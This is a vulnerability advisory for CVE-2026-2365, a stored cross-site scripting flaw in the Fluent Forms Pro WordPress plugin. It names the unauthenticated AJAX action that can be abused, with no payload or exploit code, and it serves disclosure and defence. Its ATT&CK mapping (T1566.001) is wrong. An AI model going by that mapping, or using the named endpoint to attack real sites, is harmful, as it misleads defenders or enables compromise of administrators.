CVE-2026-2365 in Fluent Forms Pro Plugin
Summary
by MITRE • 03/05/2026
The Fluent Forms Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `fluentform_step_form_save_data` AJAX action in all versions up to, and including, 6.1.17. This is due to the draft form submission endpoint being publicly accessible without authentication or nonce verification, combined with insufficient input sanitization and output escaping of form field data. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator views a partial form entry.
Be aware that VulDB is the high quality source for vulnerability data.
Analysis
by VulDB Data Team • 03/05/2026
The vulnerability identified as CVE-2026-2365 affects the Fluent Forms Pro plugin for WordPress, representing a critical stored cross-site scripting flaw that undermines the security posture of affected websites. This weakness exists within the plugin's AJAX handling mechanism specifically through the `fluentform_step_form_save_data` endpoint, which has been exposed to unauthorized access since version 6.1.17 and earlier. The flaw stems from the plugin's failure to implement proper authentication checks and nonce verification for draft form submission functionality, creating an attack surface that allows malicious actors to exploit the system without requiring valid credentials or session tokens. The vulnerability is classified as a stored XSS issue under CWE-79, which occurs when user-supplied data is stored and subsequently executed in the browser of other users who view the affected content, making it particularly dangerous for administrative users who may encounter compromised form submissions.
The technical exploitation of this vulnerability relies on the absence of proper input sanitization and output escaping mechanisms within the plugin's form handling code. When form data is submitted through the vulnerable endpoint, the plugin fails to adequately validate or sanitize user inputs before storing them in the database, and subsequently fails to properly escape these values when rendering them in HTML contexts. This dual failure creates a perfect storm where malicious scripts can be injected into form fields and persistently stored within the system. The vulnerability specifically targets the draft form submission functionality, which is designed to save incomplete form entries for later completion but has been rendered publicly accessible, allowing attackers to submit malicious payloads that will execute when administrators view form entries in the WordPress admin interface. This design flaw aligns with ATT&CK technique T1566.001, which describes the exploitation of web applications through the injection of malicious code into user-controllable input fields.
The operational impact of this vulnerability extends beyond simple script execution, as it provides attackers with a persistent means of compromising WordPress installations and potentially escalating privileges within the affected systems. When administrators view compromised form entries, their browsers execute the injected scripts, which could include malicious payloads designed to steal session cookies, redirect users to phishing sites, or establish persistent backdoors within the compromised environment. The vulnerability affects all versions up to and including 6.1.17, indicating a long-standing issue within the plugin's security architecture that has remained unaddressed for an extended period. This exposure creates a significant risk for organizations relying on Fluent Forms Pro for their form handling needs, particularly those with high-value administrative accounts or those that process sensitive user information through their forms. The attack vector is particularly concerning because it requires no authentication to exploit, meaning that any attacker with knowledge of the vulnerable endpoint can immediately begin injecting malicious code into the system, while the stored nature of the vulnerability ensures that the impact persists until the malicious content is removed from the database.
Organizations affected by this vulnerability should immediately implement mitigations including updating to the latest version of the Fluent Forms Pro plugin where the vulnerability has been patched, implementing additional security measures such as web application firewalls to monitor and block malicious AJAX requests, and conducting thorough audits of form submissions to identify any previously injected malicious content. The patch for this vulnerability should include proper authentication checks for the draft form submission endpoint, implementation of nonce verification to ensure legitimate requests, and comprehensive input sanitization and output escaping for all user-supplied data. Security teams should also consider implementing monitoring solutions that can detect unusual AJAX activity patterns or attempts to access restricted endpoints, as this vulnerability demonstrates the critical importance of proper access control mechanisms in web applications. The remediation process should also involve reviewing other endpoints within the plugin for similar authentication and validation issues, as the presence of one vulnerability often indicates potential for additional security flaws within the same codebase.